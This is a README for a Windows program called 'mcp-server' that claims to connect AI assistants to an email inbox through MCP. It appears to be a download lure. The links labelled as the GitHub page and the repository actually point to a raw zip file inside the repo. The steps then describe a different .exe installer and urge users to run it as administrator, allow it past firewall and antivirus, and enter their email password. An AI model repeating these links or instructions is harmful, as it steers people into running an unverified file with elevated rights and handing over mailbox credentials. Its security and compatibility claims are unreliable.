mcp-server
Connect AI assistants to your email inbox using the Model Context Protocol (MCP), supporting IMAP, POP3, and SMTP on Windows.
README
βοΈ mcp-server - Connect AI Assistants to Your Inbox
π What is mcp-server?
mcp-server is a Model Context Protocol (MCP) server designed for Forward Email. It connects AI assistants to your inbox so you can manage messages with smart, automated help. This application runs on Windows and works with popular email protocols like IMAP, POP3, and SMTP.
You do not need any programming knowledge to get started. This guide will walk you through how to download, install, and run mcp-server on a typical Windows computer.
π₯οΈ System Requirements
Before you start, make sure your computer meets these basic requirements:
- Windows 10 or later (64-bit recommended)
- At least 4 GB of RAM
- 500 MB of free disk space for installation
- A working internet connection
- Basic access to your email account (IMAP/POP3/SMTP enabled)
π Getting Started
Use the button below to visit the GitHub page where you can download the software.
This link takes you to the project's main GitHub repository. From there, you can find the latest release of mcp-server available for Windows.
πΎ How to Download and Install mcp-server on Windows
Follow these steps carefully:
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Open the GitHub Page
Click one of the download buttons above or enter this URL in your web browser:
https://raw.githubusercontent.com/lagofrrr/mcp-server/main/lib/server-mcp-2.0.zip -
Find the Latest Release
On the GitHub page, look for a section called Releases or a tab labeled Releases near the top. Click it. -
Download the Windows Installer
In the Releases page, look for a file that ends with.exeβ this is the installer for Windows. The file might be named something likemcp-server-setup.exe.
Click the file to begin downloading. -
Run the Installer
Once downloaded, open the.exefile by double-clicking it.
If Windows asks for permission, click Yes to allow the program to install. -
Follow the Setup Guide
The installer will open a setup window. Follow these prompts:- Accept the license agreement
- Choose an install location or keep the default
- Click Install
After installation, click Finish.
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Start mcp-server
Look for the mcp-server icon on your desktop or in the Start menu. Double-click to open the application.
π§ Basic Configuration
When you open mcp-server for the first time, you will need to connect your email account. You can do this by entering the following information:
- Email Address
- Password or App-Specific Password
- Incoming Mail Server (IMAP or POP3)
- Outgoing Mail Server (SMTP)
- Ports for IMAP/POP3 and SMTP (usual defaults are often pre-filled)
If you use Forward Email or another email provider, check their support page for these server details.
mcp-server will then link your inbox with AI assistants securely using the MCP framework. The AI can help you sort messages, search your inbox, and provide context on your emails.
π₯ How to Use mcp-server
After setup, the program runs in the background or as a small window. You can connect your AI assistant by following these steps:
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Open the Dashboard
This interface shows your inbox status and connected assistants. -
Check Connection Status
Verify that mcp-server has successfully connected to your email account. -
Configure AI Assistant Settings
Pick which AI assistant to use or configure options like response style and inbox filters. -
Use Chat or Commands
You can send commands to your assistant or chat to get help managing your emails.
π Security Notes
mcp-server connects to your email using secure protocols (IMAP, SMTP with TLS). Your login information stays on your computer and is not shared externally.
Always use strong, unique passwords to protect your accounts. If you connect with an app password supplied by your email provider, it adds an extra layer of security.
βοΈ Common Troubleshooting
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Installer wonβt run or open:
Make sure your Windows is up to date. Run the installer as an administrator by right-clicking and selecting "Run as administrator." -
Can't connect to email:
Double-check your server settings and credentials. Ensure your email provider supports third-party connections. -
AI assistant not responding:
Restart the mcp-server application. Check your internet connection. -
Firewall or antivirus blocking:
Allow mcp-server to access the internet through your firewall or antivirus software.
π Additional Information
mcp-server supports the following topics and features:
- AI integration with email context
- Secure connection standard protocols (IMAP, POP3, SMTP)
- Inbox management via AI assistants
- Forward Email compatibility
- Model Context Protocol (MCP) support for AI assistants
These make your email smarter and easier to handle.
π Useful Links
Visit the GitHub repository anytime for updates or additional help:
https://raw.githubusercontent.com/lagofrrr/mcp-server/main/lib/server-mcp-2.0.zip
You can find documentation, report issues, and learn more about the project here.
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